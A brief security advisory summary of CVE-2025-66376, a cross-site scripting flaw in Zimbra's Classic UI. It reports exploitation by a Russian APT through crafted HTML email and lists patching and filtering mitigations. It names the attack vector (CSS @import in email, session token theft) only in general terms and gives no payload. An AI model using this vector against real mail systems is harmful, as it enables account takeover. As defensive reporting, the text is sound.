CVE-2025-66376 is a stored/reflected XSS vulnerability in the Zimbra Collaboration Suite Classic UI, actively exploited by a Russian APT in spear-phishing campaigns targeting Ukrainian organizations, and listed in CISA KEV with a federal remediation deadline of April 1, 2026. Exploitation via crafted HTML email allows session token theft and credential harvesting without requiring any additional vulnerability — only that the victim preview the email in the Classic UI. Organizations running ZCS 10 before 10.0.18 should patch immediately or switch affected users to the Modern UI as an interim measure, and should implement email gateway filtering to strip or sandbox CSS @import directives.